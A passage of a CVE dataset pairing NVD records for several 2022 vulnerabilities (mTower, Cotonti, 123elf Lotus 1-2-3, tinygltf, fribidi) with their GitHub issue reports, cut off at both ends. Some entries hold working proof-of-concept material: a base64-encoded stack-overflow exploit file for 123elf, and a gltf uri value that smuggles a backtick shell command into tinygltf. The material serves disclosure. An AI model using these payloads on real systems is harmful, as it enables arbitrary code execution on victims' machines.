"url": "https://github.com/Samsung/mTower/blob/18f4b592a8a973ce5972f4e2658ea0f6e3686284/tools/ecdsa_keygen.c#L135"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/Samsung/mTower/issues/75"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://www.openssl.org/docs/manmaster/man3/EVP_CIPHER_CTX_new.html"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:samsung:mtower:*:*:*:*:*:*:*:*",
"matchCriteriaId": "8C72C53B-9CF2-4F9A-90C1-3A1FE236BA5B",
"versionEndExcluding": null,
"versionEndIncluding": "0.3.0",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"476"
] | 476 | https://github.com/Samsung/mTower/issues/75 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"Samsung",
"mTower"
] | # Affected components
affected source code file: tools/ecdsa_keygen.c
# Attack vector(s)
Lacking a check for the return value of EVP_CIPHER_CTX_new.
EVP_CIPHER_CTX_new() returns a pointer to a newly created EVP_CIPHER_CTX for success and NULL for failure.
# Suggested description of the vulnerability for use in the CVE
Null pointer dereference vulnerability in aes256_encrypt() function in Samsung Electronics mTower v0.3.0 (and earlier) due to a missing check on the return value of EVP_CIPHER_CTX_new.
# Discoverer(s)/Credits
UVScan
# Reference(s)
https://www.openssl.org/docs/manmaster/man3/EVP_CIPHER_CTX_new.html
https://github.com/Samsung/mTower/blob/18f4b592a8a973ce5972f4e2658ea0f6e3686284/tools/ecdsa_keygen.c#L135 | Security: NULL Pointer Dereference in the function aes256_encrypt() | https://api.github.com/repos/Samsung/mTower/issues/75/comments | 1 | 2022-09-02T03:29:31Z | 2022-09-05T20:21:41Z | https://github.com/Samsung/mTower/issues/75 | 1,359,661,025 | 75 | 4,090 |
CVE-2022-39839 | 2022-09-05T06:15:18.417 | Cotonti Siena 0.9.20 allows admins to conduct stored XSS attacks via a forum post. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 4.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 1.7,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Technical Description"
],
"url": "https://github.com/Cotonti/Cotonti/issues/1661"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Technical Description"
],
"url": "https://github.com/Cotonti/Cotonti/issues/1661"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:cotonti:cotonti_siena:0.9.20:*:*:*:*:*:*:*",
"matchCriteriaId": "F3269E7D-8B8A-4991-A712-3F629FF84779",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/Cotonti/Cotonti/issues/1661 | [
"Exploit",
"Issue Tracking",
"Technical Description"
] | github.com | [
"Cotonti",
"Cotonti"
] | Hello, we found the stored xss on forum.
Tested on latest version 0.9.20.
Poc:
1. Create new topic with poll

2. XSS execute

| Stored XSS on forum | https://api.github.com/repos/Cotonti/Cotonti/issues/1661/comments | 6 | 2022-08-30T19:16:21Z | 2022-09-08T08:23:03Z | https://github.com/Cotonti/Cotonti/issues/1661 | 1,356,195,142 | 1,661 | 4,091 |
CVE-2022-39840 | 2022-09-05T06:15:18.707 | Cotonti Siena 0.9.20 allows admins to conduct stored XSS attacks via a direct message (DM). | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 4.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 1.7,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/Cotonti/Cotonti/issues/1660"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/Cotonti/Cotonti/issues/1660"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:cotonti:cotonti_siena:0.9.20:*:*:*:*:*:*:*",
"matchCriteriaId": "F3269E7D-8B8A-4991-A712-3F629FF84779",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/Cotonti/Cotonti/issues/1660 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"Cotonti",
"Cotonti"
] | Hello, we found the stored xss.
Tested on latest version 0.9.20.
Poc:
1. Write a DM to any user

2. Then read the incoming message and press "quote" to quote the message with payload. Press the button Response.

3. XSS execute
 | Stored XSS | https://api.github.com/repos/Cotonti/Cotonti/issues/1660/comments | 4 | 2022-08-30T18:58:49Z | 2022-09-04T11:00:02Z | https://github.com/Cotonti/Cotonti/issues/1660 | 1,356,177,543 | 1,660 | 4,092 |
CVE-2022-39843 | 2022-09-05T07:15:08.207 | 123elf Lotus 1-2-3 before 1.0.0rc3 for Linux, and Lotus 1-2-3 R3 for UNIX and other platforms through 9.8.2, allow attackers to execute arbitrary code via a crafted worksheet. This occurs because of a stack-based buffer overflow in the cell format processing routines, as demonstrated by a certain function call from process_fmt() that can be reached via a w3r_format element in a wk3 document. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/taviso/123elf/issues/103"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes",
"Third Party Advisory"
],
"url": "https://github.com/taviso/123elf/releases/tag/v1.0.0rc3"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/taviso/123elf/issues/103"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes",
"Third Party Advisory"
],
"url": "https://github.com/taviso/123elf/releases/tag/v1.0.0rc3"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:lotus_1-2-3_project:lotus_1-2-3:1.0.0:rc1:*:*:*:*:*:*",
"matchCriteriaId": "8E852959-16B3-469D-9F65-E614E6E25C8E",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:lotus_1-2-3_project:lotus_1-2-3:1.0.0:rc2:*:*:*:*:*:*",
"matchCriteriaId": "D1B81F63-804E-46E6-8242-3D3B22DA07E4",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*",
"matchCriteriaId": "703AF700-7A70-47E2-BC3A-7FD03B3CA9C1",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
] | [
"787"
] | 787 | https://github.com/taviso/123elf/issues/103 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"taviso",
"123elf"
] | The unnamed function at 0x80bb148 is used to copy data into a buffer and lacks a destination length check. This function is called in two places - by `process_fmt()` and `fmt_cell_combine()`. The call by `process_fmt()` is reachable using a `w3r_format` element (0x13) in a wk3 file, where user-controlled data from the file is copied into a stack variable. The call by `fmt_cell_combine()` was not investigated.
```
ushort process_fmt(byte *buf,ushort buflen,ushort param_3)
{
[...]
char local_404 [1024];
[...]
uVar3 = FUN_080bb148(local_404,buf + 4,buflen - 4);
dst src len
```
Both `buf` and `buflen` are controllable. The included exploit demonstrates this by overwriting the return address to point to a `jmp esp` gadget, where the payload causes the process to exit with a return value of 3 (I had originally intended to submit this to [BGGP3](https://tmpout.sh/bggp/3/), but missed the deadline!)
A pull request will be provided containing a proposed fix.
Base64 encoded exploit.wk3 - `AAAFAAAQBAAREwAVAAAAAAD+/v7+/zMzMzO8yhIIQM2AMw==`
[edit: reduced exploit size from 38 to 34 bytes]
This was discovered using [Ghidra](https://ghidra-sre.org/) and AFL++'s [QEMU mode](https://github.com/AFLplusplus/AFLplusplus/tree/stable/qemu_mode), and was inspired by [this tweet](https://twitter.com/taviso/status/1538275971660251136). | Exploitable Stack Overflow | https://api.github.com/repos/taviso/123elf/issues/103/comments | 6 | 2022-09-04T00:40:42Z | 2022-09-11T17:48:15Z | https://github.com/taviso/123elf/issues/103 | 1,360,997,448 | 103 | 4,093 |
CVE-2022-3008 | 2022-09-05T09:15:10.110 | The tinygltf library uses the C library function wordexp() to perform file path expansion on untrusted paths that are provided from the input file. This function allows for command injection by using backticks. An attacker could craft an untrusted path input that would result in a path expansion. We recommend upgrading to 2.6.0 or past commit 52ff00a38447f06a17eab1caa2cf0730a119c751 | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.2,
"source": "cve-coordination@google.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve-coordination@google.com",
"tags": [
"Exploit",
"Issue Tracking",
"Mailing List",
"Third Party Advisory"
],
"url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=49053"
},
{
"source": "cve-coordination@google.com",
"tags": [
"Product",
"Third Party Advisory"
],
"url": "https://github.com/syoyo/tinygltf/blob/master/README.md"
},
{
"source": "cve-coordination@google.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/syoyo/tinygltf/commit/52ff00a38447f06a17eab1caa2cf0730a119c751"
},
{
"source": "cve-coordination@google.com",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/syoyo/tinygltf/issues/368"
},
{
"source": "cve-coordination@google.com",
"tags": [
"Third Party Advisory"
],
"url": "https://www.debian.org/security/2022/dsa-5232"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Mailing List",
"Third Party Advisory"
],
"url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=49053"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Product",
"Third Party Advisory"
],
"url": "https://github.com/syoyo/tinygltf/blob/master/README.md"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/syoyo/tinygltf/commit/52ff00a38447f06a17eab1caa2cf0730a119c751"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/syoyo/tinygltf/issues/368"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://www.debian.org/security/2022/dsa-5232"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:tinygltf_project:tinygltf:*:*:*:*:*:*:*:*",
"matchCriteriaId": "078C039E-D2B4-44A7-BEC7-7B77F794FB1D",
"versionEndExcluding": "2.6.0",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:debian:debian_linux:11.0:*:*:*:*:*:*:*",
"matchCriteriaId": "FA6FEEC2-9F11-4643-8827-749718254FED",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"77"
] | 77 | https://github.com/syoyo/tinygltf/issues/368 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"syoyo",
"tinygltf"
] | **Describe the issue**
This is a security vulnerability. The `wordexp` call here allows arbitrary code execution https://github.com/syoyo/tinygltf/blob/0fa56e239c77cc864dc248842e8887d985cf8e3f/tiny_gltf.h#L2640 when parsing a gltf file.
**To Reproduce**
- OS: Linux
- Compiler, compiler version, compile options: Clang 13.0.1-6
```shell
$ git clone https://github.com/syoyo/tinygltf
$ cd tinygltf && make all
$ echo '{"images":[{"uri":"a`echo iamhere > poc`"}], "asset":{"version":""}}' > payload.gltf
$ ./loader_example payload.gltf
$ cat poc
iamhere
```
**Expected behaviour**
The `echo iamhere > poc` command should not be executed and the `poc` file is not created in the CWD.
**Additional context**
This was found by OSS-Fuzz: https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=49053
One potential fix here is to pass `WRDE_NOCMD` to `wordexp` per https://man7.org/linux/man-pages/man3/wordexp.3.html
| Command injection via wordexp call. | https://api.github.com/repos/syoyo/tinygltf/issues/368/comments | 6 | 2022-08-16T06:57:34Z | 2022-09-05T23:23:45Z | https://github.com/syoyo/tinygltf/issues/368 | 1,339,900,556 | 368 | 4,094 |
CVE-2022-25308 | 2022-09-06T18:15:11.437 | A stack-based buffer overflow flaw was found in the Fribidi package. This flaw allows an attacker to pass a specially crafted file to the Fribidi application, which leads to a possible memory leak or a denial of service. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/security/cve/CVE-2022-25308"
},
{
"source": "secalert@redhat.com",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2047890"
},
{
"source": "secalert@redhat.com",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/fribidi/fribidi/issues/181"
},
{
"source": "secalert@redhat.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/fribidi/fribidi/pull/184"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/security/cve/CVE-2022-25308"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2047890"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/fribidi/fribidi/issues/181"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/fribidi/fribidi/pull/184"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gnu:fribidi:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A9E50E4E-F644-4B2F-8972-60E055F52B68",
"versionEndExcluding": "1.0.12",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*",
"matchCriteriaId": "F4CFF558-3C47-480D-A2F0-BABF26042943",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:redhat:enterprise_linux:9.0:*:*:*:*:*:*:*",
"matchCriteriaId": "7F6FB57C-2BC7-487C-96DD-132683AEB35D",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"121"
] | 121 | https://github.com/fribidi/fribidi/issues/181 | [
"Exploit",
"Patch",
"Third Party Advisory"
] | github.com | [
"fribidi",
"fribidi"
] | Hi, I found a bug, stack-buffer-overflow.
- SUMMARY:
AddressSanitizer: stack-buffer-overflow (/home/lin/fribidi/bin/fribidi+0x5ab4) in main
- Version
```
➜ bin git:(master) ✗ ./fribidi --version
fribidi (GNU FriBidi) 1.0.11
interface version 4,
Unicode Character Database version 14.0.0,
Configure options.
Copyright (C) 2004 Sharif FarsiWeb, Inc.
Copyright (C) 2001, 2002, 2004, 2005 Behdad Esfahbod
Copyright (C) 1999, 2000, 2017, 2018, 2019 Dov Grobgeld
GNU FriBidi comes with NO WARRANTY, to the extent permitted by law.
You may redistribute copies of GNU FriBidi under
the terms of the GNU Lesser General Public License.
For more information about these matters, see the file named COPYING.
Written by Behdad Esfahbod and Dov Grobgeld
```
At branch 859aa1b
- Steps to reproduce
```
git clone https://github.com/fribidi/fribidi.git
cd fribidi
./autogen.sh
CFLAGS=-fsanitize=address ./configure --disable-shared
make
./bin/fribidi ./poc
```
- Platform
```
➜ bin git:(master) ✗ gcc --version
gcc (Ubuntu 7.5.0-3ubuntu1~18.04) 7.5.0
Copyright (C) 2017 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
➜ bin git:(master) ✗ uname -r
5.4.0-91-generic
➜ bin git:(master) ✗ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 18.04.5 LTS
Release: 18.04
Codename: bionic
```
- ASAN
```
➜ bin git:(master) ✗ ./fribidi ~/id:000022,sig:06,src:000000,op:havoc,rep:128
=================================================================
==8991==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffda2c0112f at pc 0x5580929d7ab5 bp 0x7ffda2bc1820 sp 0x7ffda2bc1810
READ of size 1 at 0x7ffda2c0112f thread T0
#0 0x5580929d7ab4 in main (/home/lin/fribidi/bin/fribidi+0x5ab4)
#1 0x7fb0cce3dbf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6)
#2 0x5580929d6d29 in _start (/home/lin/fribidi/bin/fribidi+0x4d29)
Address 0x7ffda2c0112f is located in stack of thread T0 at offset 260191 in frame
#0 0x5580929d70d7 in main (/home/lin/fribidi/bin/fribidi+0x50d7)
This frame has 5 object(s):
[32, 36) 'option_index'
[96, 100) 'base'
[160, 260160) 'logical'
[260192, 325192) 'S_' <== Memory access at offset 260191 underflows this variable
[325248, 390248) 'outstring'
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
(longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow (/home/lin/fribidi/bin/fribidi+0x5ab4) in main
Shadow bytes around the buggy address:
0x1000345781d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000345781e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000345781f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100034578200: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100034578210: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x100034578220: 00 00 f2 f2 f2[f2]00 00 00 00 00 00 00 00 00 00
0x100034578230: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100034578240: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100034578250: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100034578260: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100034578270: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==8991==ABORTING
```
poc: [poc.zip](https://github.com/fribidi/fribidi/files/7761374/poc.zip)
Thanks !!! | stack-buffer-overflow on address 0x7ffda2c0112f at pc 0x5580929d7ab5 bp 0x7ffda2bc1820 sp 0x7ffda2bc1810 | https://api.github.com/repos/fribidi/fribidi/issues/181/comments | 1 | 2021-12-22T09:03:41Z | 2022-03-25T05:09:43Z | https://github.com/fribidi/fribidi/issues/181 | 1,086,605,471 | 181 | 4,095 |
CVE-2022-25309 | 2022-09-06T18:15:11.493 | A heap-based buffer overflow flaw was found in the Fribidi package and affects the fribidi_cap_rtl_to_unicode() function of the fribidi-char-sets-cap-rtl.c file. This flaw allows an attacker to pass a specially crafted file to the Fribidi application with the '--caprtl' option, leading to a crash and causing a denial of service. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/security/cve/CVE-2022-25309"
},
{
"source": "secalert@redhat.com",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2047896"
},
{
"source": "secalert@redhat.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/fribidi/fribidi/commit/f22593b82b5d1668d1997dbccd10a9c31ffea3b3"
},
{
"source": "secalert@redhat.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/fribidi/fribidi/issues/182"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/security/cve/CVE-2022-25309"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2047896"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/fribidi/fribidi/commit/f22593b82b5d1668d1997dbccd10a9c31ffea3b3"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/fribidi/fribidi/issues/182"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gnu:fribidi:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A9E50E4E-F644-4B2F-8972-60E055F52B68",
"versionEndExcluding": "1.0.12",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*",
"matchCriteriaId": "F4CFF558-3C47-480D-A2F0-BABF26042943",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:redhat:enterprise_linux:9.0:*:*:*:*:*:*:*",
"matchCriteriaId": "7F6FB57C-2BC7-487C-96DD-132683AEB35D",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"122"
] | 122 | https://github.com/fribidi/fribidi/issues/182 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"fribidi",
"fribidi"
] | Hi, I found a bug, heap-buffer-overflow.
- SUMMARY:
SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/lin/fribidi/bin/fribidi+0x108fe) in fribidi_cap_rtl_to_unicode
- Version
```
➜ bin git:(master) ✗ ./fribidi --version
fribidi (GNU FriBidi) 1.0.11
interface version 4,
Unicode Character Database version 14.0.0,
Configure options.
Copyright (C) 2004 Sharif FarsiWeb, Inc.
Copyright (C) 2001, 2002, 2004, 2005 Behdad Esfahbod
Copyright (C) 1999, 2000, 2017, 2018, 2019 Dov Grobgeld
GNU FriBidi comes with NO WARRANTY, to the extent permitted by law.
You may redistribute copies of GNU FriBidi under
the terms of the GNU Lesser General Public License.
For more information about these matters, see the file named COPYING.
Written by Behdad Esfahbod and Dov Grobgeld
```
At branch 859aa1b
- Steps to reproduce
```
git clone https://github.com/fribidi/fribidi.git
cd fribidi
./autogen.sh
CFLAGS=-fsanitize=address ./configure --disable-shared
make
./bin/fribidi --caprtl ./poc
```
- Platform
```
➜ bin git:(master) ✗ gcc --version
gcc (Ubuntu 7.5.0-3ubuntu1~18.04) 7.5.0
Copyright (C) 2017 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
➜ bin git:(master) ✗ uname -r
5.4.0-91-generic
➜ bin git:(master) ✗ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 18.04.5 LTS
Release: 18.04
Codename: bionic
```
- ASAN
```
➜ fribidi git:(master) ✗ ./bin/fribidi --caprtl ~/id:000145,sig:06,src:000565,op:havoc,rep:4
_f$
=================================================================
==10552==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61500000007c at pc 0x559f116818ff bp 0x7fffb37d3150 sp 0x7fffb37d3140
READ of size 4 at 0x61500000007c thread T0
#0 0x559f116818fe in fribidi_cap_rtl_to_unicode (/home/lin/fribidi/bin/fribidi+0x108fe)
#1 0x559f1168019e in fribidi_charset_to_unicode (/home/lin/fribidi/bin/fribidi+0xf19e)
